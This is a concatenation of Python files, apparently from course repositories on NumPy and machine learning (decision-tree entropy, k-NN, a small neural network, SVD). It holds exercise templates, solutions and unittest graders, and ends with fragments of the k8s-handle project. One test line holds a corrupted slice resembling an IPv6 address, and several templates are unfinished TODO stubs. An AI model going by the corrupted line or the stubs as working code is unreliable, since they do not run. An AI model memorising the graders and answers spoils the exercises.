mask = X[:, self.column] >= self.value
else:
mask = X[:, self.column] == self.value
return X[mask], y[mask], X[~mask], y[~mask]
def information_gain(self, X, y):
X1, y1, X2, y2 = self.divide(X, y)
p = float(len(X1)) / len(X)
gain = entropy(y) - p * entropy(y1) - (1 - p) * entropy(y2)
return gain
```
#### File: Horror Trees/Entropy/calculate_entropy.py
```python
import numpy as np
def entropy(y):
_, counts = np.unique(y, return_counts=True)
p = counts / len(y)
return -(p * np.log2(p)).sum()
```
#### File: Horror Trees/Node/calculate_entropy.py
```python
import numpy as np
def entropy(y):
# use numpy.unique to obtain sorted unique elements and their counts
_, counts = # TODO
# calculate the proportion of each class in the whole dataset
# the return value should be an array of proportions
p = # TODO
# calculate and return entropy using the formula from the task
# logarithm can be calculated using the numpy.log2 function
return # TODO
```
#### File: Horror Trees/Node/divide.py
```python
from calculate_entropy import entropy
# Here we defined the Predicate class to store predicates – values in
# particular columns that are used to split our dataset. The class
# includes the divide method, which splits the dataset by the given predicate,
# and the information_gain method, which calculates the information gain for a given split.
class Predicate:
def __init__(self, column, value):
self.column = column
self.value = value
def divide(self, X, y):
# Check if the value is numeric and create a boolean filter array
# based on the "greater than or equal to" condition.
if # TODO :
mask = # TODO
# If the value is not numeric (int or float), create the array based on the
# "equal to" condition.
else:
mask = # TODO
# Return the results in the following order: X1, y1, X2, y2.
return # TODO
# This method is to be implemented in the task "Information Gain".
def information_gain(self, X, y):
pass
# Use the divide method to split the sample.
# X1, y1, X2, y2 = # TODO
# Calculate the fraction of X1 in the whole dataset.
# p = # TODO
# Use the entropy function you wrote earlier and the formula
# from the task to calculate the information gain.
# gain = # TODO
# return gain
```
#### File: Accuracy/tests/test_task.py
```python
import unittest
from task import *
from evaluate import accuracy
from network import NN
class TestCase(unittest.TestCase):
def test_none(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertIsNotNone(accuracy(nn, X_test, y_test), msg="your function returns nothing")
def test_type(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertIsInstance(accuracy(nn, X_test, y_test), float, msg="your function returns a wrong type")
def test_interval(self):
X, y = read_data('iris.csv')
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
self.assertTrue(0 <= accuracy(nn, X_test, y_test) <= 1, msg="accuracy should be within the [0, 1] interval")
```
#### File: Iris Network/Conclusion/task.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from network import NN
from evaluate import accuracy
def read_data(fpath):
iris = pd.read_csv(fpath)
iris.loc[iris['species'] == 'virginica', 'species'] = 0
iris.loc[iris['species'] == 'versicolor', 'species'] = 1
iris.loc[iris['species'] == 'setosa', 'species'] = 2
iris = iris[iris['species'] != 2]
return iris[['petal_length', 'petal_width']].values, iris[['species']].values.astype('uint8')
def plot_data(X, y):
plt.scatter(X[:, 0], X[:, 1], c=y[:, 0], s=40, cmap=plt.cm.Spectral)
plt.title("IRIS DATA | Blue - Versicolor, Red - Virginica ")
plt.xlabel('Petal Length')
plt.ylabel('Petal Width')
plt.show()
def train_test_split(X, y, ratio=0.8):
indices = np.arange(X.shape[0])
np.random.shuffle(indices)
train_len = int(X.shape[0] * ratio)
return X[indices[:train_len]], y[indices[:train_len]], X[indices[train_len:]], y[indices[train_len:]]
if __name__ == '__main__':
X, y = read_data('iris.csv')
# comment the following line if you don't need the plot anymore
plot_data(X, y)
X_train, y_train, X_test, y_test = train_test_split(X, y, 0.7)
nn = NN(len(X[0]), 5, 1)
output = nn.feedforward(X_train)
print(output)
print(f'w1 before backward propagation: \n{nn.w1} \nw2 before backward propagation:\n{nn.w2}')
nn.backward(X_train, y_train, output)
print(f'w1 after backward propagation: \n{nn.w1} \nw2 after backward propagation:\n{nn.w2}')
nn.train(X_train, y_train)
print("Accuracy:")
print(accuracy(nn, X_test, y_test))
```
#### File: Iris Network/Neurons/activation.py
```python
import numpy as np
def sigmoid(x):
# implement the logistic sigmoid function based on the formula in the task description
# you may need the numpy.exp function
return # TODO
```
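A minimal completion sketch for this template, assuming the formula referenced by the task is the standard logistic function 1 / (1 + e^(-x)):
```python
import numpy as np

def sigmoid(x):
    # Standard logistic sigmoid; works elementwise on NumPy arrays.
    return 1 / (1 + np.exp(-x))
```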
#### File: Iris Network/Train and Predict/network.py
```python
import numpy as np
from activation import sigmoid
from derivative import sigmoid_derivative
class NN:
def __init__(self, input_size, hidden_size, output_size):
self.w1 = 2 * np.random.random((input_size, hidden_size)) - 1
self.w2 = 2 * np.random.random((hidden_size, output_size)) - 1
def feedforward(self, X):
self.layer1 = sigmoid(np.dot(X, self.w1))
return sigmoid(np.dot(self.layer1, self.w2))
def backward(self, X, y, output, learning_rate=0.01):
l2_delta = (y - output) * sigmoid_derivative(output)
l1_delta = np.dot(l2_delta, self.w2.T) * sigmoid_derivative(self.layer1)
self.w2 += (np.dot(self.layer1.T, l2_delta) * learning_rate)
self.w1 += (np.dot(X.T, l1_delta) * learning_rate)
def train(self, X, y, n_iter=20000):
for itr in range(n_iter):
l2 = self.feedforward(X)
self.backward(X, y, l2)
def predict(self, X):
return self.feedforward(X)
```
#### File: Neighbors and wine/Conclusion/distances.py
```python
import numpy as np
def euclidean_dist(x, y):
return np.linalg.norm(x - y)
def taxicab_dist(x, y):
return np.abs(x - y).sum()
```
#### File: k-nearest neighbors/tests/test_task.py
```python
import numpy as np
import unittest
from numpy.ma.testutils import assert_array_equal
from metric_classification import knn
from distances import euclidean_dist
class TestCase(unittest.TestCase):
def test_length(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_predicted = knn(X_train, y_train, X_test, 1, euclidean_dist)
        self.assertEqual(len(y_predicted), 12, "You should assign a label to each object in X_test")
def test_knn_1_neighbor(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_test = np.array([4, 3, 5, 2, 1, 2, 1, 0, 1, 5, 5, 2])
y_predicted = knn(X_train, y_train, X_test, 1, euclidean_dist)
assert_array_equal(y_predicted, y_test)
def test_knn_4_neighbor(self):
X_train = np.array([
[255, 255, 255],
[0, 0, 0],
[128, 128, 128],
[255, 0, 0],
[0, 255, 0],
[0, 0, 255]
])
y_train = np.array([0, 1, 2, 3, 4, 5])
X_test = np.array([
[0, 255, 0],
[255, 0, 0],
[0, 0, 255],
[255, 0, 255],
[100, 0, 50],
[100, 100, 100],
[50, 50, 50],
[200, 200, 200],
[10, 20, 30],
[100, 10, 200],
[32, 0, 255],
[128, 255, 64]
])
y_test = np.array([0, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0])
y_predicted = knn(X_train, y_train, X_test, 4, euclidean_dist)
assert_array_equal(y_predicted, y_test)
```
#### File: Leave-one-out/tests/test_task.py
```python
import unittest
from distances import euclidean_dist
from crossvalidation import loocv
import numpy as np
class TestCase(unittest.TestCase):
def test_loo(self):
X_train = np.array([
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[128, 128, 128],
[128, 128, 128],
[128, 128, 128],
])
y_train = np.array([0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1])
euclidean_opt = loocv(X_train, y_train, euclidean_dist)
self.assertEqual(3, euclidean_opt)
def test_loo_1_neighbor(self):
X_train = np.array([
[255, 255, 255],
[255, 255, 255],
[255, 255, 255],
[128, 128, 128],
[128, 128, 128],
[128, 128, 128],
])
y_train = np.array([1, 1, 1, 0, 0, 0])
euclidean_opt = loocv(X_train, y_train, euclidean_dist)
self.assertEqual(1, euclidean_opt)
```
#### File: Neighbors and wine/Sample division/metric_classification.py
```python
import numpy as np
def knn(X_train, y_train, X_test, k, dist):
# The function will return the class for x based on its neighbours from the X_train
# sample.
def classify_single(x):
# Here we create an array of distances from x to each of the X_train objects.
dists = #TODO
# This array will contain the indices of k nearest to the x objects. NumPy.argpartition
# might be useful here.
indices = #TODO
# The function returns the most frequent class among those in y_train represented
# by the indices.
return #TODO
return [classify_single(x) for x in X_test]
```
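One possible completion of this template (a sketch, not the course's reference solution), assuming integer class labels and a distance function with the signature used above, such as euclidean_dist:
```python
import numpy as np

def knn(X_train, y_train, X_test, k, dist):
    def classify_single(x):
        # Distances from x to every object in X_train.
        dists = np.array([dist(x, x_train) for x_train in X_train])
        # Indices of the k nearest training objects (their order does not matter).
        indices = np.argpartition(dists, k - 1)[:k]
        # Most frequent class label among the k nearest neighbours.
        return np.bincount(y_train[indices]).argmax()
    return [classify_single(x) for x in X_test]
```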
#### File: Pima indians diabetes and linear classifier/Gradient Descent/precision_recall.py
```python
import numpy as np
# The precision and recall metrics are used to evaluate the quality of the predictions
def precision_recall(y_pred, y_test):
class_precision_recall = []
for c in np.unique(y_test):
tp = len([i for i in range(len(y_pred)) if y_pred[i] == c and y_test[i] == c])
fp = len([i for i in range(len(y_pred)) if y_pred[i] == c and y_test[i] != c])
        fn = len([i for i in range(len(y_pred)) if y_test[i] == c and y_pred[i] != c])
precision = tp / (tp + fp) if tp + fp > 0 else 0.
recall = tp / (tp + fn) if tp + fn > 0 else 0.
class_precision_recall.append((c, precision, recall))
return class_precision_recall
# This method will allow you to visualize the precision and recall of the algorithm
def print_precision_recall(result):
for c, precision, recall in result:
print("class:", c, "\nprecision:", precision, "\nrecall:", recall, "\n")
```
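A small usage sketch for the two helpers above, with made-up labels (the import assumes the file is importable as precision_recall):
```python
import numpy as np
from precision_recall import precision_recall, print_precision_recall

y_test = np.array([0, 0, 1, 1, 1])
y_pred = np.array([0, 1, 1, 1, 0])

# Prints precision and recall for each class present in y_test.
print_precision_recall(precision_recall(y_pred, y_test))
```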
#### File: Gradient Descent/tests/test_task.py
```python
import unittest
import numpy as np
from gradient_descent import GradientDescent
class TestCase(unittest.TestCase):
def test_weights(self):
gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
y = np.array([1, 1, 2, 2])
gd.fit(X, y)
        self.assertEqual(5, len(gd.weights))
def test_fit(self):
gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])
y = np.array([1, 2])
result = gd.fit(X, y)
self.assertNotEqual(0, len(result))
def test_predict(self):
gd = GradientDescent(alpha=0.1)
X = np.array([[1, 2, 3, 4, 5],
[1, 2, 3, 4, 5],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0]])
y = np.array([1, 1, 2, 2])
gd.fit(X, y)
        self.assertEqual(1, gd.predict(np.array([1, 2, 3, 4, 5])))
        self.assertEqual(0, gd.predict(np.array([0, 0, 0, 0, 0])))
```
#### File: Read data/tests/test_task.py
```python
import unittest
from task import read_data
# The reference implementation:
# def read_data(fname):
# data = np.genfromtxt(fname, delimiter=',')
# X, y = data[:, :-1], data[:, -1]
# X = (X - X.mean(axis=0)) / X.std(axis=0)
# X = np.concatenate((-np.ones(len(X)).reshape(-1, 1), X), axis=1)
# y = -(y * 2 - 1)
# return X, y
class TestCase(unittest.TestCase):
def test_X(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertEqual((768, 9), X.shape, "Wrong train data length")
def test_y(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertEqual(768, len(y), "Wrong train data length")
def test_y_value(self):
X, y = read_data("pima-indians-diabetes.csv")
self.assertTrue(((y == -1) | (y == 1)).all(), "y array should contain only -1 and 1 values")
```
|
{
"source": "jetbrains-academy/Machine-Learning-101-RU",
"score": 3
}
|
#### File: Train and Predict/tests/test_task.py
```python
import unittest
import numpy as np
from numpy.ma.testutils import assert_array_equal
from network import NN
class TestCase(unittest.TestCase):
def test_predict(self):
X_train = np.array([[0, 0, 1],
[1, 1, 1],
[1, 0, 1],
[0, 1, 1]])
y_train = np.array([[0, 1, 1, 0]]).T
nn = NN(3, 3, 1)
for i in range(11):
if i == 10:
self.fail()
try:
nn.train(X_train, y_train)
nn_y = nn.predict(X_train)
assert_array_equal((nn_y > 0.5).astype(int), y_train)
break
except:
continue
```
|
{
"source": "jetbrains-academy/Python-Libraries-NumPy",
"score": 3
}
|
#### File: Random Shuffle/tests/test_task.py
```python
import unittest
import numpy as np
from task import arr, permuted_2d, fully_random
class TestCase(unittest.TestCase):
def test_shape(self):
self.assertEqual((5, 20), arr.shape, msg="Wrong shape of the array 'arr'.")
self.assertEqual((5, 20), permuted_2d.shape, msg="Wrong shape of the array 'permuted_2d'.")
self.assertEqual((5, 20), fully_random.shape, msg="Wrong shape of the array 'fully_random'.")
def test_arr(self):
for i in arr:
# This test checks if in each row the minimum element goes first and maximum - last.
self.assertTrue(i[0] == min(i) and i[-1] == max(i), msg="'arr' should be shuffled along the 0th axis.")
def test_two_d(self):
for i in permuted_2d:
# This test checks that differences between all neighboring elements in rows of the array
# are not equal to 1 (in non-shuffled rows they would be).
self.assertFalse(all([(x - i[i.tolist().index(x) - 1]) == 1 for x in i if i.tolist().index(x) > 0]),
msg="'permuted_2d' should be shuffled along the 1st axis.")
def test_random(self):
# This test checks if elements were also randomized between the rows.
for i in fully_random:
self.assertTrue(max(i) - min(i) > 19, "'fully_random' needs to be fully shuffled.")
```
#### File: Reading and Writing Files/tests/test_task.py
```python
import unittest
import numpy as np
from task import arr
# todo: replace this with an actual test
class TestCase(unittest.TestCase):
def test_add(self):
self.assertEqual((100, 4), arr.shape, msg="Wrong array shape.")
```
#### File: Indexing Basics/tests/test_task.py
```python
import unittest
import numpy as np
from task import a, b, x
class TestCase(unittest.TestCase):
def test_arrays_shape(self):
self.assertEqual((5, 2), b.shape, msg="Wrong shape of array b.")
def test_array_content(self):
self.assertEqual(19, a, msg="a has to be equal to 19.")
def test_array_b(self):
np.testing.assert_array_equal(b, x[::2, fc00:e968:6179::de52:7100], err_msg='Something wrong in array b.')
```
#### File: Integer Array Indexing/tests/test_task.py
```python
import unittest
import numpy as np
from task import x, y, a, b, c, d, e
class TestCase(unittest.TestCase):
def test_shape_a(self):
self.assertEqual((4,), a.shape, msg='Wrong shape of array a.')
def test_shape_b(self):
self.assertEqual((3, 3), b.shape, msg='Wrong shape of array b.')
def test_shape_c(self):
self.assertEqual((3, 7), c.shape, msg='Wrong shape of array c.')
def test_shape_d(self):
self.assertEqual((3,), d.shape, msg='Wrong shape of array d.')
def test_shape_e(self):
self.assertEqual((3,), e.shape, msg='Wrong shape of array e.')
def test_array_a(self):
np.testing.assert_array_equal(a, x[np.array([7, 13, 28, 33])], err_msg='Array a is not what we expected.')
def test_array_b(self):
np.testing.assert_array_equal(b, x[np.array([[0, 1, 2], [10, 11, 12], [28, 29, 30]])], err_msg='Array b is not what we expected.')
def test_array_c(self):
np.testing.assert_array_equal(c, y[np.array([0, 2, 4])], err_msg='Array c is not what we expected.')
def test_array_d(self):
np.testing.assert_array_equal(d, y[np.array([0, 2, 4]), np.array([0, 1, 2])], err_msg='Array d is not what we expected.')
def test_array_e(self):
np.testing.assert_array_equal(e, y[np.array([1, 2, 4]), 6], err_msg='Array e is not what we expected.')
```
#### File: Basic Math Functions/tests/test_task.py
```python
import unittest
import numpy as np
from task import calculate_entropy
rng = np.random.default_rng()
a = rng.integers(1, 20, size=10) # Generate some dataset.
b = a / sum(a)
task_data = [0.16666667, 0.01754386, 0.05263158, 0.13157895, 0.16666667,
0.13157895, 0.14035088, 0.01754386, 0.12280702, 0.05263158]
print(-np.sum(b * np.log2(b)))
class TestCase(unittest.TestCase):
def test_entropy_task_data(self):
self.assertEqual(-np.sum(task_data * np.log2(task_data)), calculate_entropy(task_data),
msg='Wrong answer for task dataset.')
def test_entropy_test(self):
self.assertEqual(-np.sum(b * np.log2(b)), calculate_entropy(b),
msg='Wrong answer for test dataset.')
```
#### File: Linear Algebra/tests/test_task.py
```python
import unittest
import numpy as np
from task import *
test_values, test_labels = np.array(csv[:, :2], dtype=float), np.array(csv[:, 2], dtype=np.int64)
class TestCase(unittest.TestCase):
def test_values(self):
np.testing.assert_array_equal(values, test_values, err_msg='Input values were not extracted properly from the '
'csv.')
def test_labels(self):
np.testing.assert_array_equal(labels, test_labels, err_msg='Labels were not extracted properly from the '
'csv.')
def test_predict(self):
result = predict(values)
test_result = predict(test_values)
np.testing.assert_array_equal(result, test_result, err_msg='Something wrong with the prediction.')
```
#### File: bincount/tests/test_task.py
```python
import unittest
from task import find_most_frequent_class
class TestCase(unittest.TestCase):
def test_most_frequent_class1(self):
self.assertEqual(1, find_most_frequent_class('data.csv'), msg="Incorrect class found for task data.")
def test_most_frequent_class2(self):
self.assertEqual(4, find_most_frequent_class('test_data1.csv'), msg="Incorrect class found for test data.")
def test_most_frequent_class3(self):
self.assertEqual(37, find_most_frequent_class('test_data2.csv'), msg="Incorrect class found for test data.")
```
#### File: Element-wise Comparison/tests/test_task.py
```python
import unittest
import numpy as np
from task import *
class TestCase(unittest.TestCase):
def test_array_b(self):
test_b = np.arange(0, 25, 6)
self.assertEqual(test_b.shape, b.shape, msg='Shape of array b has to be (5,).')
def test_array_c(self):
test_b = np.arange(0, 25, 6)
test_c = np.equal(a, test_b)
np.testing.assert_array_equal(compare_a_b, test_c, err_msg='Boolean arrays do not match.')
```
#### File: Search/tests/test_task.py
```python
import unittest
import numpy as np
from task import temperatures, days, high, low, result, warm_days
class TestCase(unittest.TestCase):
def test_week(self):
high_test = ['High']
low_test = ['Low']
np.testing.assert_array_equal(result, np.where(temperatures > 15, high_test, low_test),
err_msg='Your `result` array '
'does not contain the values we expected.')
def test_shape(self):
self.assertEqual(days.shape, result.shape, msg='Shape of the array `result` should match the shape of `days`.')
def test_names(self):
np.testing.assert_array_equal(warm_days, days[temperatures > 15],
err_msg='`warm_days` array is off. It should contain '
'the names of days when temperature was higher than 15')
```
#### File: Partial Sort/tests/test_task.py
```python
import unittest
from task import *
class TestCase(unittest.TestCase):
def test_indices(self):
self.assertEqual(distances.shape, indices.shape, msg="`indices` has to have the same shape as `distances`.")
def test_partition(self):
partitioned_distances = abs(partitioned_by_distance - target)
self.assertTrue(all([partitioned_distances[i] < partitioned_distances[k] for i in range(k)]) and
all([partitioned_distances[i] >= partitioned_distances[k] for i in range(k, arr.shape[0])]),
msg='`partitioned_by_distance` does not seem to be partitioned.')
def test_k_nearest(self):
self.assertEqual(3, k_nearest.shape[0], msg='k_nearest should contain 3 values closest to 0.')
```
#### File: Transposing Sorting Concatenating/Transpose 1D/task.py
```python
import numpy as np
def reshape_transpose(start, stop, step=1):
array = np.arange(start, stop, step)
reshaped = array.reshape(1, array.shape[0])
return reshaped.T
if __name__ == '__main__':
print(reshape_transpose(1, 100, 10))
print(reshape_transpose(0, 5))
```
#### File: SVD on One Matrix/tests/test_task.py
```python
import unittest
import numpy as np
from numpy import linalg
from task import img_gray, U, s, Vt
class TestCase(unittest.TestCase):
def test_svd(self):
test_U, test_s, test_Vt = linalg.svd(img_gray)
np.testing.assert_array_equal(U, test_U,
'Matrix U doesn\'t match the expected. Use linalg.svd to complete the task.')
np.testing.assert_array_equal(s, test_s,
'Matrix s doesn\'t match the expected. Use linalg.svd to complete the task.')
np.testing.assert_array_equal(Vt, test_Vt,
                                      'Matrix Vt doesn\'t match the expected. Use linalg.svd to complete the task.')
```
|
{
"source": "JetBrains/email-parser",
"score": 3
}
|
#### File: clustering/cluster/token.py
```python
import re
token_reg_ex = {
"DAY": re.compile("^\\d{1,2}[,\\.]?:?$"),
"YEAR": re.compile("^[12]\\d{3}[,\\.]?:?$"),
"DATE_SHORT": re.compile(
"^(([0-3]?[0-9][/.-][0-3]?[0-9][/.-](?:[0-9]{2})?[0-9]{2})|" +
"((?:[0-9]{2})?[0-9]{2}[/.-][0-3]?[0-9][/.-][0-3]?[0-9]))[,\\.]?:?$"),
"TIME": re.compile(
"^([01]?[0-9]|2[0-3]):[0-5][0-9](:[0-5][0-9])?[,\\.]?:?$"),
"EMAIL": re.compile("\\S+@\\S+")
}
attribute_reg_ex = {
"LAST_COLON": re.compile(".*:$")
}
token_type = {
"UNDEFINED": 0,
"DATE_RELATED": 1,
"DAY": 2,
"YEAR": 3,
"DATE_SHORT": 4,
"TIME": 5,
"EMAIL": 6
}
def check(regex, text):
res = re.match(regex, text)
if res is not None:
return res.group() == text
return False
class Token:
# --- Customizable values ---
INSERTION_COST = {
"UNDEFINED": 10,
"DATE_RELATED": 15,
"DAY": 30,
"YEAR": 30,
"DATE_SHORT": 40,
"TIME": 10,
"EMAIL": 50
}
'''
The cost of replacement the first token by the second.
Usage:
type_min_id = min(token1.type_id, token2.type_id)
type_max_id = max(token1.type_id, token2.type_id)
Token.REPLACEMENT_COST[type_max_id][type_min_id]
'''
REPLACEMENT_COST = [
[0],
[15, 0],
[15, 15, 0],
[15, 15, 15, 0],
[35, 35, 35, 35, 0],
[10, 10, 10, 10, 10, 0],
[50, 50, 50, 50, 50, 50, 0]
]
LAST_COLON_INEQUALITY_COST = 35
# ----------------------------
def __get_token_type_tuple(self):
for type_, index in token_type.items():
if type_ != "UNDEFINED" and type_ != "DATE_RELATED" and check(
token_reg_ex[type_], self.text):
return type_, index
return "UNDEFINED", 0
def __init__(self, text):
self.text = text
type_name, type_id = self.__get_token_type_tuple()
self.type_name = type_name
self.type_id = type_id
self.has_last_colon = False
    def __ne__(self, other):
        if not isinstance(other, Token):
            return NotImplemented
        if self is other:
            return False
        if self.type_id != other.type_id:
            return True
        if self.has_last_colon != other.has_last_colon:
            return True
        return False
def get_insertion_cost(self):
return self.INSERTION_COST[self.type_name]
def get_deletion_cost(self):
return self.get_insertion_cost()
def last_colon_difference(self, other):
if self.has_last_colon != other.has_last_colon:
return Token.LAST_COLON_INEQUALITY_COST
else:
return 0
def get_difference(self, other):
difference = 0
if self.type_name != other.type_name:
type_min_id = min(self.type_id, other.type_id)
type_max_id = max(self.type_id, other.type_id)
difference += self.REPLACEMENT_COST[type_max_id][type_min_id]
difference += self.last_colon_difference(other)
return difference
def __str__(self):
return self.text + "(" + self.type_name + ") last_colon = " + str(
self.has_last_colon)
def set_type(self, new_type_name):
if new_type_name not in token_type:
raise Exception("Illegal token type.")
self.type_name = new_type_name
self.type_id = token_type[new_type_name]
```
#### File: clustering/executable/mst_clustering.py
```python
import sys
import os
sys.path.append(os.getcwd())
import time
import numpy as np
from sklearn.cluster import AffinityPropagation
from sklearn import metrics
from cluster.prepare_data import get_labels, get_affinity_matrix, \
read_dist_matrix, write_clusterized_data, print_metrics, setup_costs
from cluster.prepare_data import get_headers_pairs_list
from cluster.token_edit_distance import get_distance_matrix
from scipy.sparse import csr_matrix
from scipy.sparse.csgraph import connected_components
# -------------
__parent = dict()
__rank = dict()
def __make_set(vertice):
__parent[vertice] = vertice
__rank[vertice] = 0
def __find(vertice):
if __parent[vertice] != vertice:
__parent[vertice] = __find(__parent[vertice])
return __parent[vertice]
def __union(vertice1, vertice2):
root1 = __find(vertice1)
root2 = __find(vertice2)
if root1 != root2:
if __rank[root1] > __rank[root2]:
__parent[root2] = root1
else:
__parent[root1] = root2
if __rank[root1] == __rank[root2]:
__rank[root2] += 1
def __kruskal(graph):
for vertice in range(graph['vertices_num']):
__make_set(vertice)
minimum_spanning_tree = set()
edges = list(graph['edges'])
edges.sort()
for edge in edges:
weight, vertice1, vertice2 = edge
if __find(vertice1) != __find(vertice2):
__union(vertice1, vertice2)
minimum_spanning_tree.add(edge)
return minimum_spanning_tree
def get_mst(distance_matrix):
edges = set()
for i, line in enumerate(distance_matrix):
for j, e in enumerate(line):
if j < i:
edges.add((distance_matrix[i][j], i, j))
graph = {
'vertices_num': len(distance_matrix),
'edges': edges
}
return __kruskal(graph)
def get_cluster(mst_, min_dist=10):
if min_dist <= 0:
raise Exception("min_dist must be positive, but {0}".format(min_dist))
mst_sorted = sorted(mst_, key=lambda x: x[0])
idx = len(mst_sorted)
for i in range(len(mst_sorted)):
if mst_sorted[i][0] > min_dist:
idx = i
break
return mst_sorted[:idx]
def get_labels_predict(edges, n):
row = []
col = []
data = []
for (cost, from_, to_) in edges:
row.append(from_)
col.append(to_)
data.append(cost)
row.append(to_)
col.append(from_)
data.append(cost)
csr_graph = csr_matrix((data, (row, col)), shape=(n, n))
return connected_components(csr_graph, directed=False)
def fit(dist_matr, min_dist=10):
mst = get_mst(dist_matr)
conn_components = get_cluster(mst, min_dist)
n_clusters, labels = get_labels_predict(conn_components, len(dist_matr))
return n_clusters, labels
# --------
def clustering(headers, min_dist, distance_matrix_filename=None):
if distance_matrix_filename is None:
dist_matrix, _ = get_distance_matrix(headers)
else:
dist_matrix, _ = read_dist_matrix(distance_matrix_filename)
n_clusters_, labels = fit(dist_matrix, min_dist)
return metrics.silhouette_score(np.asmatrix(dist_matrix), labels,
metric='precomputed')
def main(dataset_filename, output_data_filename,
distance_matrix_filename=None, display=False, min_dist=10):
start = time.perf_counter()
headers_pairs = get_headers_pairs_list(dataset_filename, verbose=True)
labels_true = get_labels(dataset_filename, verbose=True)
if distance_matrix_filename is None:
dist_matrix, max_dist = get_distance_matrix(list(map(lambda x: x[1],
headers_pairs)),
verbose=True)
else:
dist_matrix, max_dist = \
read_dist_matrix(distance_matrix_filename, verbose=True)
print("Clustering...")
n_clusters_, labels = fit(dist_matrix, min_dist)
print("Done.")
print("clusters {0}".format(n_clusters_))
print(labels)
metrics_list = [
n_clusters_,
metrics.homogeneity_score(labels_true, labels),
metrics.completeness_score(labels_true, labels),
metrics.v_measure_score(labels_true, labels),
metrics.adjusted_rand_score(labels_true, labels),
metrics.adjusted_mutual_info_score(labels_true, labels),
metrics.silhouette_score(np.asmatrix(dist_matrix), labels,
metric='precomputed')
]
print_metrics(metrics_list)
write_clusterized_data(output_data_filename, headers_pairs, labels,
metrics=metrics_list, verbose=True)
end = time.perf_counter()
print("\nWorking time: %f sec." % (end - start))
# if display:
# visualize(dist_matrix, labels, cluster_centers_indices,
# show_cluster_sizes=True)
def get_average(params):
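    # 29 is the total number of cost parameters: 7 insertion costs, 21 replacement costs and 1 colon cost.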
    (ins_cost, repl_matr, colon_cost) = params
    total = colon_cost
    for line in repl_matr:
        for x in line:
            total += x
    for x in ins_cost:
        total += x
    return total // 29
if __name__ == "__main__":
if len(sys.argv) < 3:
print(
"Too few arguments. You should provide: \n1. dataset_filename" +
"\n2. output_data_filename \n3. distance_matrix_filename (optional)"
)
sys.exit()
dataset_filename_ = sys.argv[1]
output_data_filename_ = sys.argv[2]
distance_matrix_filename_ = sys.argv[3] if len(sys.argv) > 3 else None
params = [[108, 116, 112, 76, 100, 147, 158], [[66], [36, 143], [158, 41, 63], [86, 56, 61, 12], [136, 10, 10, 190, 119], [146, 10, 52, 64, 75, 122]], 157]
setup_costs(params)
avg = get_average(params)
print(avg)
main(dataset_filename_, output_data_filename_, min_dist=avg)
```
|
{
"source": "jetbrains-infra/k8s-handle",
"score": 4
}
|
#### File: k8s-handle/k8s_handle/dictionary.py
```python
import copy
def merge(dict_x, dict_y):
result = copy.deepcopy(dict_x)
for key, value in dict_y.items():
if isinstance(value, dict) and isinstance(result.get(key), dict):
result[key] = merge(result[key], value)
continue
result[key] = value
return result
```
#### File: k8s/availability_checker/test_resource_getters.py
```python
from unittest import TestCase
from k8s_handle.k8s.mocks import ResourcesAPIMock
from .resource_getters import CoreResourceGetter, RegularResourceGetter
from .mocks import MockResource
class TestCoreResourceGetter(TestCase):
def setUp(self):
self.getter = CoreResourceGetter(
ResourcesAPIMock(group_version="v1", resources=[MockResource("Pod"), MockResource("CronJob")])
)
def test_is_processable_version(self):
self.assertTrue(self.getter.is_processable_version("v1"))
self.assertFalse(self.getter.is_processable_version("app/v1"))
self.assertFalse(self.getter.is_processable_version("/"))
self.assertFalse(self.getter.is_processable_version(""))
def test_get_resources_by_version(self):
self.assertSetEqual({"Pod", "CronJob"}, self.getter.get_resources_by_version("v1"))
self.assertSetEqual(set(), self.getter.get_resources_by_version("v2"))
class TestRegularResourceGetter(TestCase):
def setUp(self):
self.getter = RegularResourceGetter(
ResourcesAPIMock(group_version="app/v1", resources=[MockResource("Pod"), MockResource("CronJob")])
)
def test_is_processable_version(self):
self.assertFalse(self.getter.is_processable_version("v1"))
self.assertTrue(self.getter.is_processable_version("app/betav1"))
self.assertTrue(self.getter.is_processable_version("app/v1"))
self.assertFalse(self.getter.is_processable_version("/"))
self.assertFalse(self.getter.is_processable_version(""))
def test_get_resources_by_version(self):
self.assertSetEqual({"Pod", "CronJob"}, self.getter.get_resources_by_version("app/v1"))
self.assertSetEqual(set(), self.getter.get_resources_by_version("app/betav1"))
```
#### File: jetbrains-infra/k8s-handle/setup.py
```python
import os
from setuptools import setup, find_packages
readme_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'README.md')
def get_content(path):
with open(path, 'r') as f:
return f.read()
setup(name='k8s-handle',
